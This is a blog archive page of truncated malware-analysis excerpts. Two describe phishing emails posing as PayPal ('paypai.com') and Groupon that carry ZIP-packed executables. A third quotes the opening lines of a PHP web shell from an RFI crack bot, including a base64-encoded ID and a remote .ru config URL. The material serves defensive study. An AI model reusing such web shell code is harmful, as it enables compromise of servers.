Irregular Expressions:

backdoor


August 21, 2012  12:35 AM

Paypai.com



Posted by: Dan O'Connor
backdoor, malware, malware analyzing, malware engineering, remnux, trojan

I picked up another similar listener to the Groupon one the other day. This again is an attached ZIP file with an exe inside. It says it's from paypai.com; depending on your font, the i will look like an L. The exe looks like it has been reused but I don't see any mention of its original file...

July 26, 2012  10:59 PM

Discount Gift Certificates



Posted by: Dan O'Connor
backdoor, command and control, communication, digital forensics

Wow, really, I can't wait to get those. I got a fake Groupon email today with a zip attachment that had an exe inside. First thing was to get it copied onto my VM system (and hope it does not do something silly while running in a VM). Then get a few of my favorite utils fired up. For...


August 21, 2010  12:26 AM

Casper RFI crack bot – Part 4



Posted by: Dan O'Connor
backdoor, casper, perl rfi crack bot, rootkit, sudo exploit

sh.txt This one also looks juicy! Another php, <?php $sh_id = "Q2FTcEVyX0thRUB5YWhPTy5jT20="; $sh_ver = "0.0 01.01.2010"; $sh_name = base64_decode($sh_id).$sh_ver; $sh_mainurl = "http://xxxxxx.ru/config/"; $html_start =...

